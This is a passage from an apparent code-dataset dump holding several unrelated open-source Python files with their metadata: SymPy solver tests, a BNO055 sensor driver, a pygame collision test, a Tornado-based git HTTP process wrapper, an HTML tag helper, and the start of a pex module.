RootOf(x**6 - x + 1, 2), RootOf(x**6 - x + 1, 3), RootOf(x**6 - x + 1, 4),
RootOf(x**6 - x + 1, 5)]
def test_issues_3720_3721_3722_3149():
# 3722
x, y = symbols('x y')
assert solve(abs(x + 3) - 2*abs(x - 3)) == [1, 9]
assert solve([abs(x) - 2, arg(x) - pi], x) == [
{re(x): -2, x: -2, im(x): 0}, {re(x): 2, x: 2, im(x): 0}]
assert solve([re(x) - 1, im(x) - 2], x) == [
{re(x): 1, x: 1 + 2*I, im(x): 2}]
w = symbols('w', integer=True)
assert solve(2*x**w - 4*y**w, w) == solve((x/y)**w - 2, w)
x, y = symbols('x y', real=True)
assert solve(x + y*I + 3) == {y: 0, x: -3}
# github issue 2642
assert solve(x*(1 + I)) == [0]
x, y = symbols('x y', imaginary=True)
assert solve(x + y*I + 3 + 2*I) == {x: -2*I, y: 3*I}
x = symbols('x', real=True)
assert solve(x + y + 3 + 2*I) == {x: -3, y: -2*I}
# issue 3149
f = Function('f')
assert solve(f(x + 1) - f(2*x - 1)) == [2]
assert solve(log(x + 1) - log(2*x - 1)) == [2]
x = symbols('x')
assert solve(2**x + 4**x) == [I*pi/log(2)]
def test_issue_3890():
f = Function('f')
assert solve(Eq(-f(x), Piecewise((1, x > 0), (0, True))), f(x)) == \
[Piecewise((-1, x > 0), (0, True))]
def test_lambert_multivariate():
from sympy.abc import a, x, y
from sympy.solvers.bivariate import _filtered_gens, _lambert, _solve_lambert
assert _filtered_gens(Poly(x + 1/x + exp(x) + y), x) == set([x, exp(x)])
assert _lambert(x, x) == []
assert solve((x**2 - 2*x + 1).subs(x, log(x) + 3*x)) == [LambertW(3*S.Exp1)/3]
assert solve((x**2 - 2*x + 1).subs(x, (log(x) + 3*x)**2 - 1)) == \
[LambertW(3*exp(-sqrt(2)))/3, LambertW(3*exp(sqrt(2)))/3]
assert solve((x**2 - 2*x - 2).subs(x, log(x) + 3*x)) == \
[LambertW(3*exp(1 + sqrt(3)))/3, LambertW(3*exp(-sqrt(3) + 1))/3]
assert solve(x*log(x) + 3*x + 1, x) == [exp(-3 + LambertW(-exp(3)))]
eq = (x*exp(x) - 3).subs(x, x*exp(x))
assert solve(eq) == [LambertW(3*exp(-LambertW(3)))]
# coverage test
raises(NotImplementedError, lambda: solve(x - sin(x)*log(y - x), x))
# if sign is unknown then only this one solution is obtained
assert solve(3*log(a**(3*x + 5)) + a**(3*x + 5), x) == [
-((log(a**5) + LambertW(S(1)/3))/(3*log(a)))] # tested numerically
p = symbols('p', positive=True)
assert solve(3*log(p**(3*x + 5)) + p**(3*x + 5), x) == [
log((-3**(S(1)/3) - 3**(S(5)/6)*I)*LambertW(S(1)/3)**(S(1)/3)/(2*p**(S(5)/3)))/log(p),
log((-3**(S(1)/3) + 3**(S(5)/6)*I)*LambertW(S(1)/3)**(S(1)/3)/(2*p**(S(5)/3)))/log(p),
log((3*LambertW(S(1)/3)/p**5)**(1/(3*log(p)))),] # checked numerically
# check collection
assert solve(3*log(a**(3*x + 5)) + b*log(a**(3*x + 5)) + a**(3*x + 5), x) == [
-((log(a**5) + LambertW(1/(b + 3)))/(3*log(a)))]
eq = 4*2**(2*p + 3) - 2*p - 3
assert _solve_lambert(eq, p, _filtered_gens(Poly(eq), p)) == [
-S(3)/2 - LambertW(-4*log(2))/(2*log(2))]
# issue 1172
assert solve((a/x + exp(x/2)).diff(x, 2), x) == [
6*LambertW((-1)**(S(1)/3)*a**(S(1)/3)/3)]
assert solve((log(x) + x).subs(x, x**2 + 1)) == [
-I*sqrt(-LambertW(1) + 1), sqrt(-1 + LambertW(1))]
# these only give one of the solutions (see XFAIL below)
assert solve(x**3 - 3**x, x) == [-3/log(3)*LambertW(-log(3)/3)]
# replacing 3 with 2 in the above solution gives 2
assert solve(x**2 - 2**x, x) == [2]
assert solve(-x**2 + 2**x, x) == [2]
assert solve(3**cos(x) - cos(x)**3) == [
acos(-3*LambertW(-log(3)/3)/log(3))]
@XFAIL
def test_other_lambert():
from sympy.abc import x
assert solve(3*sin(x) - x*sin(3), x) == [3]
assert set(solve(3*log(x) - x*log(3))) == set(
[3, -3*LambertW(-log(3)/3)/log(3)])
a = S(6)/5
assert set(solve(x**a - a**x)) == set(
[a, -a*LambertW(-log(a)/a)/log(a)])
assert set(solve(3**cos(x) - cos(x)**3)) == set(
[acos(3), acos(-3*LambertW(-log(3)/3)/log(3))])
assert set(solve(x**2 - 2**x)) == set(
[2, -2/log(2)*LambertW(log(2)/2)])
def test_rewrite_trig():
assert solve(sin(x) + tan(x)) == [0, 2*pi]
assert solve(sin(x) + sec(x)) == [
-2*atan(-S.Half + sqrt(2 - 2*sqrt(3)*I)/2 + sqrt(3)*I/2),
2*atan(S.Half - sqrt(3)*I/2 + sqrt(2 - 2*sqrt(3)*I)/2),
2*atan(S.Half - sqrt(2 + 2*sqrt(3)*I)/2 + sqrt(3)*I/2),
2*atan(S.Half + sqrt(2 + 2*sqrt(3)*I)/2 + sqrt(3)*I/2)]
assert solve(sinh(x) + tanh(x)) == [0, I*pi]
@XFAIL
def test_rewrite_trigh():
# if this import passes then the test below should also pass
from sympy import sech
assert solve(sinh(x) + sech(x)) == [
2*atanh(-S.Half + sqrt(5)/2 - sqrt(-2*sqrt(5) + 2)/2),
2*atanh(-S.Half + sqrt(5)/2 + sqrt(-2*sqrt(5) + 2)/2),
2*atanh(-sqrt(5)/2 - S.Half + sqrt(2 + 2*sqrt(5))/2),
2*atanh(-sqrt(2 + 2*sqrt(5))/2 - sqrt(5)/2 - S.Half)]
def test_uselogcombine():
eq = z - log(x) + log(y/(x*(-1 + y**2/x**2)))
assert solve(eq, x, force=True) == [-sqrt(y*(y - exp(z))), sqrt(y*(y - exp(z)))]
assert solve(log(x + 3) + log(1 + 3/x) - 3) == [
-3 + sqrt(-12 + exp(3))*exp(S(3)/2)/2 + exp(3)/2,
-sqrt(-12 + exp(3))*exp(S(3)/2)/2 - 3 + exp(3)/2]
def test_atan2():
assert solve(atan2(x, 2) - pi/3, x) == [2*sqrt(3)]
def test_errorinverses():
assert solve(erf(x) - y, x) == [erfinv(y)]
assert solve(erfinv(x) - y, x) == [erf(y)]
assert solve(erfc(x) - y, x) == [erfcinv(y)]
assert solve(erfcinv(x) - y, x) == [erfc(y)]
def test_misc():
# shouldn't generate a GeneratorsNeeded error in _tsolve when the NaN is generated
# for eq_down. Actual answers, as determined numerically, are approx. +/- 0.83
assert solve(sinh(x)*sinh(sinh(x)) + cosh(x)*cosh(sinh(x)) - 3) is not None
# watch out for recursive loop in tsolve
raises(NotImplementedError, lambda: solve((x + 2)**y*x - 3, x))
def test_gh2725():
R = Symbol('R')
eq = sqrt(2)*R*sqrt(1/(R + 1)) + (R + 1)*(sqrt(2)*sqrt(1/(R + 1)) - 1)
sol = solve(eq, R, set=True)[1]
assert sol == set([(S(5)/3 + 40/(3*(251 + 3*sqrt(111)*I)**(S(1)/3)) +
(251 + 3*sqrt(111)*I)**(S(1)/3)/3,), ((-160 + (1 +
sqrt(3)*I)*(10 - (1 + sqrt(3)*I)*(251 +
3*sqrt(111)*I)**(S(1)/3))*(251 +
3*sqrt(111)*I)**(S(1)/3))/Mul(6, (1 +
sqrt(3)*I), (251 + 3*sqrt(111)*I)**(S(1)/3),
evaluate=False),)])
def test_issue_2015_3512():
# See that it doesn't hang; this solves in about 2 seconds.
# Also check that the solution is relatively small.
# Note: the system in issue 3512 solves in about 5 seconds and has
# an op-count of 138336 (with simplify=False).
b, c, d, e, f, g, h, i, j, k, l, m, n, o, p, q, r = symbols('b:r')
eqs = Matrix([
[b - c/d + r/d], [c*(1/g + 1/e + 1/d) - f/g - r/d],
[-c/g + f*(1/j + 1/i + 1/g) - h/i], [-f/i + h*(1/m + 1/l + 1/i) - k/m],
[-h/m + k*(1/p + 1/o + 1/m) - n/p], [-k/p + n*(1/q + 1/p)]])
v = Matrix([f, h, k, n, b, c])
ans = solve(list(eqs), list(v), simplify=False)
# If time is taken to simplify, then the 2617 below becomes
# 1168 and the time is about 50 seconds instead of 2.
assert sum([s.count_ops() for s in ans.values()]) <= 2617
def test_det_quick():
m = Matrix(3, 3, symbols('a:9'))
assert m.det() == det_quick(m) # calls det_perm
m[0, 0] = 1
assert m.det() == det_quick(m) # calls det_minor
m = Matrix(3, 3, list(range(9)))
assert m.det() == det_quick(m) # defaults to .det()
# make sure they work with Sparse
s = SparseMatrix(2, 2, (1, 2, 1, 4))
assert det_perm(s) == det_minor(s) == s.det()
|
gpl-3.0
| -7,980,767,662,230,217,000
| 37.597232
| 94
| 0.481523
| false
| 2.423859
| true
| false
| false
|
treehopper-electronics/treehopper-sdk
|
Python/treehopper/libraries/sensors/inertial/bno055.py
|
1
|
4767
|
from time import sleep
from typing import List
from treehopper.api import I2C
from treehopper.libraries import SMBusDevice
from treehopper.libraries.sensors.inertial.bno055_registers import Bno055Registers, OperatingModes, PowerModes
from treehopper.libraries.sensors.inertial import Accelerometer, Gyroscope
from treehopper.libraries.sensors.magnetic.magnetometer import Magnetometer
from treehopper.libraries.sensors.temperature import TemperatureSensor
class Bno055(Accelerometer, Gyroscope, Magnetometer, TemperatureSensor):
"""Bosch BNO055 9-axis IMU with absolute orientation output"""
@staticmethod
def probe(i2c: I2C, rate=100) -> List['Bno055']:
devs = [] # type: List['Bno055']
try:
dev = SMBusDevice(0x28, i2c, rate)
who_am_i = dev.read_byte_data(0x00)
if who_am_i == 0xa0:
devs.append(Bno055(i2c, False, rate))
except RuntimeError:
pass
try:
dev = SMBusDevice(0x29, i2c, rate)
who_am_i = dev.read_byte_data(0x00)
if who_am_i == 0xa0:
devs.append(Bno055(i2c, True, rate)) # alt_address=True: this device answered at 0x29
except RuntimeError:
pass
return devs
def __init__(self, i2c: I2C, alt_address=False, rate=100):
super().__init__()
self._linear_acceleration = [0, 0, 0]
self._quaternion = [0, 0, 0, 0]
self._gravity = [0, 0, 0]
self._eular_angles = [0, 0, 0]
if alt_address:
dev = SMBusDevice(0x29, i2c, rate)
else:
dev = SMBusDevice(0x28, i2c, rate)
self._registers = Bno055Registers(dev)
self._registers.operatingMode.operatingMode = OperatingModes.ConfigMode
self._registers.operatingMode.write()
self._registers.sysTrigger.resetSys = 1
self._registers.sysTrigger.write()
self._registers.sysTrigger.resetSys = 0
dev_id = 0
while dev_id != 0xA0:
try:
self._registers.chipId.read()
dev_id = self._registers.chipId.value
except RuntimeError:
pass
sleep(0.05)
self._registers.powerMode.powerMode = PowerModes.Normal
self._registers.powerMode.write()
sleep(0.01)
self._registers.sysTrigger.selfTest = 0
self._registers.sysTrigger.write()
sleep(0.01)
self._registers.operatingMode.operatingMode = OperatingModes.NineDegreesOfFreedom
self._registers.operatingMode.write()
sleep(0.02)
@property
def linear_acceleration(self):
if self.auto_update_when_property_read:
self.update()
return self._linear_acceleration
@property
def gravity(self):
if self.auto_update_when_property_read:
self.update()
return self._gravity
@property
def eular_angles(self):
if self.auto_update_when_property_read:
self.update()
return self._eular_angles
@property
def quaternion(self):
if self.auto_update_when_property_read:
self.update()
return self._quaternion
def update(self):
self._registers.readRange(self._registers.accelX, self._registers.temp)
self._accelerometer = [self._registers.accelX.value / 16,
self._registers.accelY.value / 16,
self._registers.accelZ.value / 16]
self._magnetometer = [self._registers.magnetometerX.value / 16,
self._registers.magnetometerY.value / 16,
self._registers.magnetometerZ.value / 16]
self._gyroscope = [self._registers.gyroX.value / 16,
self._registers.gyroY.value / 16,
self._registers.gyroZ.value / 16]
self._linear_acceleration = [self._registers.linX.value / 100,
self._registers.linY.value / 100,
self._registers.linZ.value / 100]
self._gravity = [self._registers.gravX.value / 100,
self._registers.gravY.value / 100,
self._registers.gravZ.value / 100]
self._eular_angles = [self._registers.eulPitch.value / 100,
self._registers.eulRoll.value / 100,
self._registers.eulHeading.value / 100]
self._quaternion = [self._registers.quaW.value / 16384,
self._registers.quaX.value / 16384,
self._registers.quaY.value / 16384,
self._registers.quaZ.value / 16384]
self._celsius = self._registers.temp.value
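# --- Illustrative usage sketch, not part of the driver ---
# Assumes a single Treehopper board is attached; find_boards()/connect() are
# taken from treehopper.api examples, everything else is defined above.
if __name__ == '__main__':
    from treehopper.api import find_boards
    board = find_boards()[0]
    board.connect()
    imus = Bno055.probe(board.i2c)
    if imus:
        imu = imus[0]
        imu.update()  # one burst read of all accel/gyro/mag/fusion registers
        print(imu.eular_angles, imu.quaternion)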
|
mit
| 2,991,752,316,976,240,000
| 34.849624
| 110
| 0.578561
| false
| 3.786338
| false
| false
| false
|
placher/pokeproject2
|
devfiles/testprojectileimpact.py
|
1
|
3561
|
import sys
import pygame
import os
import inspect
from pygame.locals import *
currentdir = os.path.dirname(os.path.abspath(inspect.getfile(inspect.currentframe())))
parentdir = os.path.dirname(currentdir)
sys.path.insert(0,parentdir)
from scripts import player
from scripts import background
from scripts import projectile
class GameSpace:
''' Game Space Controller '''
def main(self):
''' ---------- Initialize Game Space ---------- '''
# initialize pygame enviroment
pygame.init()
# size of the screen
self.size = self.width, self.height = 960, 720
# define base color
self.gray = 128, 128, 128
# initialize display
self.screen = pygame.display.set_mode(self.size)
# initialize sprite movement speed
self.moveSpeed = 1
''' ---------- Initialize Game Objects ---------- '''
# background image
self.background = background.Background()
# player character
self.player = player.Player(1, self.size, self.moveSpeed)
# player 2 character
self.enemy = player.Player(2, self.size, self.moveSpeed)
self.enemy.rect = self.enemy.rect.move((300, 300))
self.enemy.lastDirection = "Up"
# player projectiles
self.projectiles = []
for i in range(8):
self.projectiles.append(projectile.Projectile(1, self.size, 2*self.moveSpeed))
# next projectile
self.nextProjectile = 0
# game clock
self.clock = pygame.time.Clock()
# sprite groups
self.playerSprites = pygame.sprite.RenderPlain((self.player))
self.enemySprites = pygame.sprite.RenderPlain((self.enemy))
self.playerProjectiles = pygame.sprite.RenderPlain(*self.projectiles)
''' ---------- Initiate Game Loop ---------- '''
# continue loop until game over
cont = True
while (cont):
''' ---------- Tick Speed Regulation ---------- '''
# update only 60 times per second
self.clock.tick(60)
''' ---------- Read User Inputs ---------- '''
for event in pygame.event.get():
if event.type == QUIT:
sys.exit()
elif event.type == KEYDOWN and event.key == K_SPACE:
# player attack animation
self.player.attack()
# fire next projectile
self.projectiles[self.nextProjectile].fire(self.player.rect.center, self.player.lastDirection)
# increment projectile counter
self.nextProjectile += 1
if self.nextProjectile == len(self.projectiles):
self.nextProjectile = 0
elif event.type == KEYDOWN:
self.player.keyPressed(event)
elif event.type == KEYUP:
self.player.keyReleased(event)
''' ---------- Call Tick (update) on Game Objects ---------- '''
# update sprites
self.playerSprites.update()
self.playerProjectiles.update()
self.enemySprites.update()
# check for collisions
for impact in pygame.sprite.groupcollide(self.playerProjectiles, self.enemySprites, False, False).keys():
impact.hitSomething()
if (self.enemy.hit() == 0):
# enemy defeated
print("\nYou Win!!\n")
cont = False
''' ---------- Update Screen ---------- '''
# clear screen
self.screen.fill(self.gray)
# draw background
self.screen.blit(self.background.image, self.background.rect)
# render all game objects
self.playerSprites.draw(self.screen)
self.playerProjectiles.draw(self.screen)
self.enemySprites.draw(self.screen)
# flip renderer
pygame.display.flip()
if __name__ == '__main__':
gs = GameSpace()
gs.main()
|
gpl-3.0
| -4,463,376,372,307,577,300
| 29.965217
| 236
| 0.660769
| false
| 3.306407
| false
| false
| false
|
mensi/gittornado
|
gittornado/iowrapper.py
|
1
|
16438
|
# -*- coding: utf-8 -*-
#
# Copyright 2011 Manuel Stocker <mensi@mensi.ch>
#
# This file is part of GitTornado.
#
# GitTornado is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# GitTornado is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with GitTornado. If not, see http://www.gnu.org/licenses
import subprocess
import zlib
import os
import os.path
import tornado.ioloop
from gittornado.util import get_date_header
import logging
logger = logging.getLogger(__name__)
class FileWrapper(object):
"""Wraps a file and communicates with HTTP client"""
def __init__(self, request, filename, headers={}):
self.request = request
self.headers = headers.copy()
try:
self.file = open(filename, 'rb')
filesize = os.path.getsize(filename)
except:
raise tornado.web.HTTPError(500, 'Unable to open file')
self.headers.update({'Date': get_date_header(), 'Content-Length': str(filesize)})
self.request.write('HTTP/1.1 200 OK\r\n' + '\r\n'.join([ k + ': ' + v for k, v in self.headers.items()]) + '\r\n\r\n')
self.write_chunk()
def write_chunk(self):
data = self.file.read(8192)
if data == '':
# EOF
self.file.close()
self.request.finish()
return
# write data to client and continue when data has been written
self.request.write(data, self.write_chunk)
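# Illustrative only: FileWrapper expects the raw tornado request object because
# it writes the HTTP status line itself. A hypothetical dispatch function
# (the name and path below are made up) might look like:
#
# def serve_info_refs(request, repo_path):
#     FileWrapper(request, os.path.join(repo_path, 'info', 'refs'),
#                 {'Content-Type': 'text/plain'})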
class ProcessWrapper(object):
"""Wraps a subprocess and communicates with HTTP client
Supports gzip compression and chunked transfer encoding
"""
reading_chunks = False
got_chunk = False
headers_sent = False
got_request = False
sent_chunks = False
number_of_8k_chunks_sent = 0
gzip_decompressor = None
gzip_header_seen = False
process_input_buffer = ''
output_prelude = ''
def __init__(self, request, command, headers, output_prelude=''):
"""Wrap a subprocess
:param request: tornado request object
:param command: command to be given to subprocess.Popen
:param headers: headers to be included on success
:param output_prelude: data to send before the output of the process
"""
self.request = request
self.headers = headers
self.output_prelude = output_prelude
# invoke process
self.process = subprocess.Popen(command, stdin=subprocess.PIPE, stderr=subprocess.PIPE, stdout=subprocess.PIPE)
# check return status
if self.process.poll() is not None:
raise tornado.web.HTTPError(500, 'subprocess returned prematurely')
# get fds
self.fd_stdout = self.process.stdout.fileno()
self.fd_stderr = self.process.stderr.fileno()
self.fd_stdin = self.process.stdin.fileno()
# register with ioloop
self.ioloop = tornado.ioloop.IOLoop.instance()
self.ioloop.add_handler(self.fd_stdout, self._handle_stdout_event, self.ioloop.READ | self.ioloop.ERROR)
self.ioloop.add_handler(self.fd_stderr, self._handle_stderr_event, self.ioloop.READ | self.ioloop.ERROR)
self.ioloop.add_handler(self.fd_stdin, self._handle_stdin_event, self.ioloop.WRITE | self.ioloop.ERROR)
# is it gzipped? If yes, we initialize a zlib decompressobj
if 'gzip' in request.headers.get('Content-Encoding', '').lower(): # HTTP/1.1 RFC says value is case-insensitive
logger.debug("Gzipped request. Initializing decompressor.")
self.gzip_decompressor = zlib.decompressobj(16 + zlib.MAX_WBITS) # skip the gzip header
if self.request.method == 'POST':
# Handle chunked encoding
if request.headers.get('Expect', None) == '100-continue' and request.headers.get('Transfer-Encoding', None) == 'chunked':
logger.debug('Request uses chunked transfer encoding. Sending 100 Continue.')
self.httpstream = self.request.connection.stream
self.request.write("HTTP/1.1 100 (Continue)\r\n\r\n")
self.read_chunks()
else:
logger.debug('Got complete request')
if self.gzip_decompressor:
assert request.body[:2] == '\x1f\x8b', "gzip header"
self.process_input_buffer = self.gzip_decompressor.decompress(request.body)
else:
self.process_input_buffer = request.body
self.got_request = True
else:
logger.debug("Method %s has no input", self.request.method)
self.got_request = True
def read_chunks(self):
"""Read chunks from the HTTP client"""
if self.reading_chunks and self.got_chunk:
# we got on the fast-path and directly read from the buffer.
# if we continue to recurse, this is going to blow up the stack.
# so instead return
#
# NOTE: This actually is unnecessary as long as tornado guarantees that
# ioloop.add_callback always gets dispatched via the main io loop
# and they don't introduce a fast-path similar to read_XY
logger.debug("Fast-Path detected, returning...")
return
while not self.got_request:
self.reading_chunks = True
self.got_chunk = False
# a chunk starts with its length, so read that first; the callback chain then reads the chunk body
self.httpstream.read_until("\r\n", self._chunk_length)
self.reading_chunks = False
if self.got_chunk:
# the previous read hit the fast path and read from the buffer
# instead of going through the main polling loop. This means we
# should iteratively issue the next request
logger.debug("Fast-Path detected, iterating...")
continue
else:
break
# if we arrive here, we read the complete request or
# the ioloop has scheduled another call to read_chunks
return
def _chunk_length(self, data):
"""Received the chunk length"""
assert data[-2:] == "\r\n", "CRLF"
length = data[:-2].split(';')[0] # cut off optional length parameters
length = int(length.strip(), 16) # length is in hex
if length:
logger.debug('Got chunk length: %d', length)
self.httpstream.read_bytes(length + 2, self._chunk_data)
else:
logger.debug('Got last chunk (size 0)')
self.got_request = True
# enable input write event so the handler can finish things up
# when it has written all pending data
self.ioloop.update_handler(self.fd_stdin, self.ioloop.WRITE | self.ioloop.ERROR)
def _chunk_data(self, data):
"""Received chunk data"""
assert data[-2:] == "\r\n", "CRLF"
if self.gzip_decompressor:
if not self.gzip_header_seen:
assert data[:2] == '\x1f\x8b', "gzip header"
self.gzip_header_seen = True
self.process_input_buffer += self.gzip_decompressor.decompress(data[:-2])
else:
self.process_input_buffer += data[:-2]
self.got_chunk = True
if self.process_input_buffer:
# since we now have data in the buffer, enable write events again
logger.debug('Got data in buffer, interested in writing to process again')
self.ioloop.update_handler(self.fd_stdin, self.ioloop.WRITE | self.ioloop.ERROR)
# do NOT call read_chunks directly. This is to give git a chance to consume input.
# we don't want to grow the buffer unnecessarily.
# Additionally, this should mitigate the stack explosion mentioned in read_chunks
self.ioloop.add_callback(self.read_chunks)
def _handle_stdin_event(self, fd, events):
"""Eventhandler for stdin"""
assert fd == self.fd_stdin
if events & self.ioloop.ERROR:
# An error at the end is expected since tornado maps HUP to ERROR
logger.debug('Error on stdin')
# ensure pipe is closed
if not self.process.stdin.closed:
self.process.stdin.close()
# remove handler
self.ioloop.remove_handler(self.fd_stdin)
# if all fds are closed, we can finish
return self._graceful_finish()
# got data ready
logger.debug('stdin ready for write')
if self.process_input_buffer:
count = os.write(fd, self.process_input_buffer)
logger.debug('Wrote first %d bytes of %d total', count, len(self.process_input_buffer))
self.process_input_buffer = self.process_input_buffer[count:]
if not self.process_input_buffer:
# consumed everything in the buffer
if self.got_request:
# we got the request and wrote everything to the process
# this means we can close stdin and stop handling events
# for it
logger.debug('Got complete request, closing stdin')
self.process.stdin.close()
self.ioloop.remove_handler(fd)
else:
# There is more data bound to come from the client
# so just disable write events for the moment until
# we got more to write
logger.debug('Not interested in write events on stdin anymore')
self.ioloop.update_handler(fd, self.ioloop.ERROR)
def _handle_stdout_event(self, fd, events):
"""Eventhandler for stdout"""
assert fd == self.fd_stdout
if events & self.ioloop.READ:
# got data ready to read
data = ''
# Now basically we have two cases: either the client supports
# HTTP/1.1, in which case we can stream the answer in chunked mode,
# or it is HTTP/1.0 and we need to send a Content-Length, which means buffering the complete output
if self.request.supports_http_1_1():
if not self.headers_sent:
self.sent_chunks = True
self.headers.update({'Date': get_date_header(), 'Transfer-Encoding': 'chunked'})
data = 'HTTP/1.1 200 OK\r\n' + '\r\n'.join([ k + ': ' + v for k, v in self.headers.items()]) + '\r\n\r\n'
if self.output_prelude:
data += hex(len(self.output_prelude))[2:] + "\r\n" # cut off 0x
data += self.output_prelude + "\r\n"
self.headers_sent = True
payload = os.read(fd, 8192)
if events & self.ioloop.ERROR: # there might be data remaining in the buffer if we got HUP, get it all
remainder = True
while remainder != '': # until EOF
remainder = os.read(fd, 8192)
payload += remainder
data += hex(len(payload))[2:] + "\r\n" # cut off 0x
data += payload + "\r\n"
else:
if not self.headers_sent:
# Use the over-eager blocking read that will get everything until we hit EOF
# this might actually be somewhat dangerous as noted in the subprocess documentation
# and lead to a deadlock. This is only a legacy mode for HTTP/1.0 clients anyway,
# so we might want to remove it entirely
payload = self.process.stdout.read()
self.headers.update({'Date': get_date_header(), 'Content-Length': str(len(payload))})
data = 'HTTP/1.0 200 OK\r\n' + '\r\n'.join([ k + ': ' + v for k, v in self.headers.items()]) + '\r\n\r\n'
self.headers_sent = True
data += self.output_prelude + payload
else:
# this is actually somewhat illegal as it messes with content-length but
# it shouldn't happen anyways, as the read above should have read anything
# python docs say this can happen on ttys...
logger.error("This should not happen")
data = self.process.stdout.read()
if len(data) == 8200:
self.number_of_8k_chunks_sent += 1
else:
if self.number_of_8k_chunks_sent > 0:
logger.debug('Sent %d * 8192 bytes', self.number_of_8k_chunks_sent)
self.number_of_8k_chunks_sent = 0
logger.debug('Sending stdout to client %d bytes: %r', len(data), data[:20])
self.request.write(data)
# now we can also have an error. This is because tornado maps HUP onto error
# therefore, no elif here!
if events & self.ioloop.ERROR:
logger.debug('Error on stdout')
# ensure file is closed
if not self.process.stdout.closed:
self.process.stdout.close()
# remove handler
self.ioloop.remove_handler(self.fd_stdout)
# if all fds are closed, we can finish
return self._graceful_finish()
def _handle_stderr_event(self, fd, events):
"""Eventhandler for stderr"""
assert fd == self.fd_stderr
if events & self.ioloop.READ:
# got data ready
if not self.headers_sent:
payload = self.process.stderr.read()
data = 'HTTP/1.1 500 Internal Server Error\r\nDate: %s\r\nContent-Length: %d\r\n\r\n' % (get_date_header(), len(payload))
self.headers_sent = True
data += payload
else:
# see stdout
logger.error("This should not happen (stderr)")
data = self.process.stderr.read()
logger.debug('Sending stderr to client: %r', data)
self.request.write(data)
if events & self.ioloop.ERROR:
logger.debug('Error on stderr')
# ensure file is closed
if not self.process.stderr.closed:
self.process.stderr.close()
# remove handler
self.ioloop.remove_handler(self.fd_stderr)
# if all fds are closed, we can finish
return self._graceful_finish()
def _graceful_finish(self):
"""Detect if process has closed pipes and we can finish"""
if not self.process.stdout.closed or not self.process.stderr.closed:
return # stdout/stderr still open
if not self.process.stdin.closed:
self.process.stdin.close()
if self.number_of_8k_chunks_sent > 0:
logger.debug('Sent %d * 8k chunks', self.number_of_8k_chunks_sent)
logger.debug("Finishing up. Process poll: %r", self.process.poll())
if not self.headers_sent:
retval = self.process.poll()
if retval != 0:
logger.warning("Empty response. Git return value: " + str(retval))
payload = "Did not produce any data. Errorcode: " + str(retval)
data = 'HTTP/1.1 500 Internal Server Error\r\nDate: %s\r\nContent-Length: %d\r\n\r\n' % (get_date_header(), len(payload))
self.headers_sent = True
data += payload
self.request.write(data)
else:
data = 'HTTP/1.1 200 Ok\r\nDate: %s\r\nContent-Length: 0\r\n\r\n' % get_date_header()
self.headers_sent = True
self.request.write(data)
# if we are in chunked mode, send end chunk with length 0
elif self.sent_chunks:
logger.debug("End chunk")
self.request.write("0\r\n")
# we could now send some more headers or trailers here
self.request.write("\r\n")
self.request.finish()
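# Illustrative only: a sketch of wiring `git upload-pack` into ProcessWrapper.
# The dispatch function and repo_path are assumptions; the flags shown are the
# standard smart-HTTP stateless-RPC invocation.
#
# def handle_upload_pack(request, repo_path):
#     command = ['git', 'upload-pack', '--stateless-rpc', repo_path]
#     headers = {'Content-Type': 'application/x-git-upload-pack-result'}
#     ProcessWrapper(request, command, headers)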
|
gpl-3.0
| 4,464,436,423,476,009,500
| 40.510101
| 137
| 0.582309
| false
| 4.209475
| false
| false
| false
|
markomanninen/tagtor
|
tagtor/main.py
|
1
|
3012
|
#!/usr/local/bin/python
# -*- coding: utf-8 -*-
# file: main.py
from copy import deepcopy
class TAG(object):
""" Simple html tag generator """
def __init__(self, *args, **kw):
self._name = self.__class__.__name__.lower()
self._attributes = dict([k.lower(), str(w)] for k, w in kw.iteritems())
self._in = []
self._left = []
self._right = []
map(self.__lshift__, args)
def getName(self):
return self._name
def setName(self, name):
self._name = name
return self
def getAttribute(self, key):
return self._attributes[key] if self._attributes.has_key(key) else None
def setAttribute(self, key, value):
self._attributes[key] = value
return self
def rcontent(self, item):
return self.__rshift__(item)
def __rshift__(self, item):
self._in = [item] + self._in
return self
def content(self, item):
return self.__lshift__(item)
def __lshift__(self, item):
self._in.append(item)
return self
def prepend(self, item):
return self.__radd__(item)
def __radd__(self, item):
self._left.append(item)
return self
def append(self, item):
return self.__add__(item)
def __add__(self, item):
self._right.append(item)
return self
def renderAttributes(self):
attr = ''
if self._attributes:
attr = ''.join([' %s="%s"' % (k, v) for k, v in self._attributes.iteritems()])
return attr
def _repr_html_(self):
return self.__str__()
def __str__(self):
left = ''
right = ''
element = ''
if self._in:
in_elements = ''.join([str(item() if callable(item) else item) for item in self._in])
element = '<%s%s>%s</%s>' % (self._name, self.renderAttributes(), in_elements, self._name)
else:
element = '<%s%s/>' % (self._name, self.renderAttributes())
if self._left:
left = ''.join(map(lambda item: str(item() if callable(item) else item), self._left))
if self._right:
right = ''.join(map(lambda item: str(item() if callable(item) else item), self._right))
return left + element + right
class htmlHelper(object):
""" Tag generation factory """
def __getattr__(self, tag):
""" Only create tag object, if it hasn't been created before. """
if not self.__dict__.has_key(tag):
self.__dict__[tag] = type(tag, (TAG,), {})
# Don't return a reference to the cached class; return a deep copy instead.
return deepcopy(self.__dict__[tag])
"""
All tag elements are accessible via readily constructed factory variable. This helper
should be imported from the module in this wise: ´from tagtor import helper´
OR ´from tagtor import helper as h´ if shorter variable name is preferred
"""
helper = htmlHelper()
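# A minimal demonstration of the factory above; the rendered markup in the
# trailing comment is illustrative.
if __name__ == '__main__':
    row = helper.tr(helper.td('a'), helper.td('b'))
    table = helper.table(row, border='1')
    print table  # <table border="1"><tr><td>a</td><td>b</td></tr></table>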
|
mit
| -2,851,480,116,332,622,300
| 30.673684
| 102
| 0.548537
| false
| 3.921773
| false
| false
| false
|
sixninetynine/pex
|
pex/resolver_options.py
|
1
|
7285
|
# Copyright 2014 Pants project contributors (see CONTRIBUTORS.md).
# Licensed under the Apache License, Version 2.0 (see LICENSE).
from __future__ import print_function
from pkg_resources import safe_name
from .crawler import Crawler
from .fetcher import Fetcher, PyPIFetcher
from .http import Context
from .installer import EggInstaller, WheelInstaller
from .iterator import Iterator
from .package import EggPackage, SourcePackage, WheelPackage
from .sorter import Sorter
from .translator import ChainedTranslator, EggTranslator, SourceTranslator, WheelTranslator
class ResolverOptionsInterface(object):
def get_context(self):
raise NotImplementedError
